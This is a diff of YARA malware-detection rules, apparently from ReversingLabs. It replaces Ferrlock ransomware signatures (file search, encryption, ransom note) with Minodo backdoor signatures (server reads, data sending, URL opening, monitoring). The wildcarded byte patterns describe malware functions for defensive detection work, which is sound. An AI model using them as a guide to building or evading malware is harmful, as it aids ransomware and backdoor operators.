?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 - ?? 11 ?? 16 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0B DE - ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? - 11 ?? 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 07 2A + $read_server_data_v1 = { + 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 28 ?? + ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0A 06 16 3E ?? ?? ?? ?? 28 + ?? ?? ?? ?? 06 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 6A 59 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 3A ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 16 6A 3E ?? ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ?? + ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? ?? ?? + ?? 69 6F ?? ?? ?? ?? 0B 07 16 3D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? + ?? ?? ?? 07 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6A 59 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 16 6A 3C ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 30 ?? + 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 16 6A 28 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ?? + ?? ?? ?? 38 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ?? + ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 3C ?? ?? ?? ?? 16 + 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? + ?? ?? ?? 69 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 38 ?? ?? + ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD } - $encrypt_files_p2 = { - 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 0A 02 06 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? - ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? ?? 8D ?? ?? - ?? ?? 0B 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? - ?? ?? ?? 0D 09 07 09 8E 69 28 ?? ?? ?? ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 19 28 - ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? - ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 02 28 - ?? ?? ?? ?? 13 ?? 11 ?? 17 5F 17 33 ?? 11 ?? 17 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? - ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 38 ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? - ?? 8D ?? ?? ?? ?? 13 ?? 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 19 28 - ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F - ?? ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 26 DE ?? - 2A + $send_v1 = { + 28 ?? ?? ?? ?? 0A 16 0B 06 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DD ?? + ?? ?? ?? 02 8E 69 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? + ?? ?? 08 16 08 8E 69 6F ?? ?? ?? ?? 02 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ?? 02 73 ?? + ?? ?? ?? 0D 16 13 ?? 09 16 6A 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 38 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 6F + ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 + 13 ?? 16 30 ?? DD ?? ?? ?? ?? 09 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? + 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? + 6F ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ?? + 06 28 ?? ?? ?? ?? DC } - $find_files_p1 = { - 02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 16 0C 2B ?? 06 08 9A 28 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 08 9A 28 ?? ?? ?? ?? 08 17 58 0C 08 06 8E 69 32 ?? 16 0D - 2B ?? 07 09 9A 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 32 ?? DE ?? 26 DE ?? 2A + $read_packet_v1_p1 = { + 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 02 74 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B + 07 28 ?? ?? ?? ?? 0C 08 20 4F 01 89 64 42 ?? ?? ?? ?? 08 20 7A 39 BA 13 42 ?? ?? ?? + ?? 08 20 D4 CA CD 0C 3B ?? ?? ?? ?? 08 20 7A 39 BA 13 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? + 08 20 2B C2 32 1B 3B ?? ?? ?? ?? 08 20 E2 A2 F4 57 3B ?? ?? ?? ?? 08 20 4F 01 89 64 + 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 08 20 5A 15 79 D9 42 ?? ?? ?? ?? 08 20 B7 16 DB 7A 3B + ?? ?? ?? ?? 08 20 39 20 3F B2 3B ?? ?? ?? ?? 08 20 5A 15 79 D9 3B ?? ?? ?? ?? 38 ?? + ?? ?? ?? 08 20 1E CA D2 DC 3B ?? ?? ?? ?? 08 20 45 FD B6 E0 3B ?? ?? ?? ?? 08 20 D0 + 5E 9B FA 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? + ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? + ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? + ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 } - $find_files_p2 = { - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? - ?? 1F ?? 8D ?? ?? ?? ?? 25 16 1E 28 ?? ?? ?? ?? A2 25 17 1F ?? 28 ?? ?? ?? ?? A2 25 18 - 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 ?? ?? ?? ?? A2 25 - 1B 1B 28 ?? ?? ?? ?? A2 25 1C 1C 28 ?? ?? ?? ?? A2 25 1D 1F ?? 28 ?? ?? ?? ?? A2 25 1E - 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? - A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1B 28 ?? - ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? - 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? - A2 0A 16 0B 2B ?? 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? 2A + $read_packet_v1_p2 = { + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 ?? + ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? + 16 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 6F ?? + ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 7B ?? + ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? + 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 ?? + 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 12 ?? (FE | 16) ?? ?? ?? + ?? ?? 6F ?? ?? ?? ?? DC 73 ?? ?? ?? ?? 26 06 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? + 73 ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? + 7E ?? ?? ?? ?? 25 3A ?? ?? ?? ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ?? 73 } - $drop_ransom_note = { - 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? - ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E - ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? - ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 26 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 26 73 ?? ?? ?? ?? 0A 7E ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 26 2A + $send_v2 = { + 7E ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 16 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? + ?? ?? ?? 39 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 8E + B7 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 06 08 16 08 8E B7 + 6F ?? ?? ?? ?? 06 07 16 07 8E B7 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? + 26 7E ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? B7 16 14 (FE | 06) ?? ?? ?? + ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC DE ?? + 25 28 ?? ?? ?? ?? 0D 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C ?? 11 ?? + 28 ?? ?? ?? ?? DC + } + $open_url_v2 = { + 03 39 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 20 00 0C 00 00 28 ?? ?? ?? ?? 20 0F 27 00 00 28 + ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 28 ?? ?? ?? ?? 74 ?? ?? ?? + ?? 0A 06 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 7E ?? ?? ?? ?? 8E B7 6F ?? ?? ?? ?? 9A 6F ?? + ?? ?? ?? 06 17 6F ?? ?? ?? ?? 06 20 10 27 00 00 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC + 2B ?? 02 28 ?? ?? ?? ?? 26 + } + $monitoring_v2 = { + 73 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? + 11 ?? 9A 0B 08 07 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 28 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E B7 32 ?? 1F ?? 0A 38 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0D 09 6F ?? ?? ?? ?? 28 ?? + ?? ?? ?? 2C ?? 2B ?? 08 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 (FE | 07) ?? ?? ?? ?? ?? + 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 1F ?? 31 ?? 16 0A 72 ?? ?? ?? ?? 09 6F ?? ?? + ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 D6 13 ?? + 11 ?? 11 ?? 8E B7 32 ?? 06 17 D6 0A 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 3A } condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) + uint16(0)==0x5A4D and ((($read_server_data_v1) and ($send_v1) and ( all of ($read_packet_v1_p*))) or (($send_v2) and ($open_url_v2) and ($monitoring_v2))) } -rule REVERSINGLABS_Win32_Ransomware_Ferrlock : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Backdoor_Minodo : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Ferrlock ransomware." + description = "Yara rule that detects Minodo backdoor." author = "ReversingLabs" - id = "745ce529-46d0-56ed-a8fa-b41b26b068f4" - date = "2020-07-15" - modified = "2020-07-15" + id = "0eeff863-1a46-5b25-8780-5cd887e3b1e2" + date = "2023-06-07" + modified = "2023-06-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ferrlock.yara#L1-L131" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b94bc77489dbb74573813631009e605bc848e17995a0a512d08b194ee3020b75" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Win64.Backdoor.Minodo.yara#L1-L110" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "807408699fe00c8d1170598050e533dd0d79bb170f2538b6b6227cda7410060b" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ferrlock" + tc_detection_type = "Backdoor" + tc_detection_name = "Minodo" tc_detection_factor = 5 importance = 25 strings: - $search_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 - F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ?? - ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF - 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B - CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B - 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF - 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 - C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA - ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB - } - $search_files_p2 = { - 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56 - 1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? - ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15 - ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 - C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? - 80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 - 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $enum_rsrc = { - 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 8D 4D ?? 83 4D ?? ?? 51 50 6A - ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 - ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? EB ?? 33 DB 39 5D ?? 7E ?? - 8D 7E ?? F7 47 ?? ?? ?? ?? ?? 74 ?? 8D 47 ?? 89 45 ?? 8B 45 ?? 8B 00 8B 48 ?? 85 C9 - 74 ?? 8B 01 8D 55 ?? 52 FF 50 ?? EB ?? FF 37 8D 4D ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D - 45 ?? 50 8B 45 ?? 8B 48 ?? E8 ?? ?? ?? ?? 83 4D ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 43 83 - C7 ?? 3B 5D ?? 7C ?? 83 4D ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? C2 ?? ?? E8 ?? ?? ?? ?? CC 55 8B EC 6A ?? 68 ?? ?? ?? ?? - 64 A1 ?? ?? ?? ?? 50 56 A1 ?? ?? ?? ?? 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 - 65 ?? ?? 8B 4E ?? 85 C9 74 ?? 8B 11 3B CE 0F 95 C0 0F B6 C0 50 FF 52 ?? 83 66 ?? ?? - 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C3 + $generate_system_id = { + 40 55 53 56 57 41 56 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B F1 48 8D 55 ?? 48 8D + 4D ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 DB 85 C0 75 ?? 66 C7 45 ?? ?? ?? 4C + 8D 45 ?? 48 8D 55 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 + ?? 66 C7 45 ?? ?? ?? 48 83 4D ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? 8B CB 48 8B D3 BE ?? ?? + ?? ?? 48 85 D2 7E ?? 44 8A 54 15 ?? EB ?? 44 8A 95 ?? ?? ?? ?? 41 8A 01 49 FF C1 48 + FF C2 32 44 15 ?? 41 32 C2 41 32 00 49 FF C0 88 44 15 ?? 41 38 19 75 ?? 83 C9 ?? 4C + 8D 4D ?? 41 38 18 75 ?? 83 C9 ?? 4C 8D 45 ?? 48 3B D6 75 ?? 83 C9 ?? 48 8B D3 83 F9 + ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 48 8D 5D ?? 49 8B FE 44 + 0F B6 03 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 83 C7 ?? 48 FF C3 48 FF CE 75 ?? + FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 8B D8 FF 15 ?? ?? ?? ?? 48 8D 55 + ?? 44 8B CB 4D 8B C6 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5E 5F 5E 5B + 5D C3 } - $create_test_file_p1 = { - 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 33 DB 8D 55 - ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 59 8D 45 ?? C6 45 ?? ?? - 50 8D 4D ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 - ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 CB ?? 8B 3D ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 65 ?? ?? - 8D 4D ?? 83 65 ?? ?? 56 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? FF 75 ?? 8B 45 ?? 2B 45 - ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 55 ?? 8D 4D ?? 0F 43 45 ?? - 83 7D ?? ?? 0F 43 4D ?? 3B 55 ?? 75 ?? 52 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? - ?? ?? ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? - ?? 8D 4D ?? 0F 85 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 0F 85 ?? ?? - ?? ?? 83 7D ?? ?? 8D 45 